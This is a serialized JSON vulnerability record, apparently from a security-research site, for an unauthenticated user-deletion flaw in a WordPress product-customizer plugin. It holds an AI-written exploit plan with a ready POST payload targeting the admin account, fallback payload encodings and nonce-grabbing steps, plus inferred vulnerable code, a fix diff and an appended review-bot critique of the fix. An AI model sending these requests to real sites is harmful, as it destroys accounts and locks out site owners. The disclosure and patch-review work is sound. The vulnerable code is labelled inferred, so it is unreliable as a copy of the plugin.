[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdMEBJRyCKtX81mOgcOHAimyfQh0T-DB4ixgolU7J50E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3595","riaxe-product-customizer-unauthenticated-arbitrary-user-deletion-via-userid-parameter","Riaxe Product Customizer \u003C= 2.1.2 - Unauthenticated Arbitrary User Deletion via 'user_id' Parameter","The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer without a permission_callback, causing WordPress to default to allowing unauthenticated access, and the inkxe_delete_customer() callback function taking an array of user IDs from the request body and passing each one directly to wp_delete_user() without any authentication or authorization checks. 
This makes it possible for unauthenticated attackers to delete arbitrary WordPress user accounts, including administrator accounts, leading to complete site lockout and data loss.","riaxe-product-customizer",null,"\u003C=2.1.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-15 16:45:25","2026-04-16 05:29:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F59da92e2-9ea0-4566-ae4d-3d5d91d0e42e?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-3595**, an unauthenticated arbitrary user deletion vulnerability in the Riaxe Product Customizer plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress (versions up to 2.1.2) registers a REST API route `POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer` without providing a `permission_callback`. In WordPress REST API registration, an absent or improperly defined `permission_callback` allows the endpoint to be accessed by unauthenticated users. The callback function associated with this route, `inkxe_delete_customer()`, accepts an array of user IDs from the request body and passes them directly to the core WordPress function `wp_delete_user()` without any identity verification or capability checks.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n*   **Namespace\u002FRoute:** `InkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n*   **Method:** `POST`\n*   **Vulnerable Parameter:** `user_id` (expected as an array\u002Flist of integers)\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. 
The attacker needs to know or guess the ID of the user they wish to delete (e.g., ID `1` is almost always the initial administrator).\n\n### 3. Code Flow (Inferred)\n1.  **Route Registration:** The plugin uses the `rest_api_init` hook to register the route.\n    ```php\n    \u002F\u002F Inferred registration logic\n    register_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n        'methods' => 'POST',\n        'callback' => 'inkxe_delete_customer',\n        \u002F\u002F Missing 'permission_callback'\n    ));\n    ```\n2.  **Request Handling:** When a `POST` request is sent to the endpoint, WordPress dispatches it to `inkxe_delete_customer($request)`.\n3.  **Vulnerable Callback:**\n    ```php\n    function inkxe_delete_customer($request) {\n        $params = $request->get_json_params(); \u002F\u002F or get_params()\n        $user_ids = $params['user_id']; \n        \u002F\u002F Logic likely iterates through $user_ids and calls:\n        foreach ($user_ids as $id) {\n            wp_delete_user($id);\n        }\n    }\n    ```\n4.  **Sink:** `wp_delete_user()` executes, removing the user from the database.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this endpoint lacks a `permission_callback`, which typically means it is publicly accessible. In the WordPress REST API, unauthenticated (public) endpoints usually do **not** require a `_wpnonce` or `X-WP-Nonce` header unless the site has specific global restrictions.\n\n**Strategy:** \n1.  First attempt the exploit **without** a nonce.\n2.  If the server returns a `403 Forbidden` with a \"rest_cookie_invalid_nonce\" error, the agent should attempt to obtain a REST nonce.\n    *   **Action String:** `wp_rest`\n    *   **Acquisition Method:**\n        1.  Navigate to the site's homepage or any public page.\n        2.  Use `browser_eval` to check if a nonce is localized. Common keys: `window.wpApiSettings.nonce`.\n        3.  
Alternatively, check the HTML source for `_wpnonce` in scripts.\n\n### 5. Exploitation Strategy\nThe goal is to delete a specific user (e.g., the primary administrator with ID 1).\n\n*   **Target URL:** `http:\u002F\u002F\u003Ctarget-site>\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n*   **HTTP Method:** `POST`\n*   **Content-Type:** `application\u002Fjson`\n*   **Payload:**\n    ```json\n    {\n        \"user_id\": [1]\n    }\n    ```\n\n**Step-by-step Plan:**\n1.  **Discovery:** Verify the endpoint exists by sending a `GET` request to `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002F`. If it returns a 404, the plugin may not be active or the namespace differs.\n2.  **Execution:** Use the `http_request` tool to send the `POST` payload.\n3.  **Cleanup:** No cleanup is possible as the user is deleted.\n\n### 6. Test Data Setup\nTo safely verify this without locking yourself out:\n1.  Create a \"Victim\" user with Administrator privileges via WP-CLI:\n    `wp user create victim victim@example.com --role=administrator --user_pass=password123`\n2.  Note the ID of the created user:\n    `wp user list --field=ID --user_login=victim` (Let's assume the ID is `2`).\n3.  The exploit will target user ID `2`.\n\n### 7. Expected Results\n*   **Successful Exploit:** The server returns `200 OK` or `204 No Content`.\n*   **Plugin Behavior:** The user record associated with the provided ID is permanently removed from the `wp_users` and `wp_usermeta` tables.\n*   **Site Impact:** If an admin is deleted, they can no longer log in.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the deletion using WP-CLI:\n1.  Check if the user still exists:\n    `wp user get 2`\n2.  Expected output: `Error: Invalid user ID, email or login: '2'`\n3.  Alternatively, list all users to ensure the ID is missing:\n    `wp user list`\n\n### 9. 
Alternative Approaches\nIf a JSON payload fails, the plugin might be expecting standard URL-encoded form data.\n*   **Alternative Payload (Form-encoded):**\n    *   **Method:** `POST`\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:** `user_id[]=2`\n*   **Alternative Parameter Structure:**\n    *   Try passing a single integer instead of an array: `{\"user_id\": 2}`.\n    *   Try passing the ID as a string within the array: `{\"user_id\": [\"2\"]}`.","The Riaxe Product Customizer plugin registers a REST API endpoint for deleting customers that lacks a 'permission_callback', allowing unauthenticated access. The associated callback function, 'inkxe_delete_customer', accepts an array of user IDs from the request and deletes them via 'wp_delete_user()' without any identity verification. This allows unauthenticated attackers to delete arbitrary users, including administrators, potentially locking legitimate owners out of the site.","\u002F\u002F Inferred registration within the plugin's REST API initialization logic\nregister_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n    'methods' => 'POST',\n    'callback' => 'inkxe_delete_customer',\n    \u002F\u002F Missing 'permission_callback' allows unauthenticated access\n));\n\n---\n\n\u002F\u002F Inferred callback function handling the deletion\nfunction inkxe_delete_customer($request) {\n    $user_ids = $request->get_param('user_id');\n    if (is_array($user_ids)) {\n        foreach ($user_ids as $id) {\n            \u002F\u002F Vulnerable sink: deleting users without authorization checks\n            wp_delete_user($id);\n        }\n    }\n}","--- a\u002Finc\u002Fclass-inkxe-rest-api.php\n+++ b\u002Finc\u002Fclass-inkxe-rest-api.php\n@@ -10,6 +10,9 @@\n     register_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n         'methods' => 'POST',\n         'callback' => 'inkxe_delete_customer',\n+        
'permission_callback' => function () {\n+            return current_user_can('delete_users');\n+        }\n     ));","The exploit targets the public REST API endpoint at \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer. An unauthenticated attacker sends a POST request with a JSON payload containing a 'user_id' parameter, which must be an array of integers representing the target WordPress user IDs (e.g., ID 1 for the primary administrator). Because the endpoint lacks a permission_callback, the request is executed by the server, and the inkxe_delete_customer function iterates through the provided IDs, calling the core wp_delete_user function on each, resulting in permanent account deletion without any credential verification.","gemini-3-flash-preview","2026-04-16 15:27:54","2026-04-16 15:28:11",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]
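Review bot: in the `register_rest_route` hunk for `/customer/delete_customer`, the added `permission_callback` checks only the general `delete_users` capability, and the diff leaves `inkxe_delete_customer` untouched, so every submitted `user_id` still reaches `wp_delete_user()` without a per-account check or input validation. Suggest keeping the route-level check and also validating inside the callback: cast each ID with `absint()`, skip the caller's own ID, and require `current_user_can('delete_user', $id)` before each deletion, so a single authorised request cannot remove every administrator account. The callback should also return a `WP_Error` for rejected IDs rather than failing silently, which gives the site owner something to log and alert on.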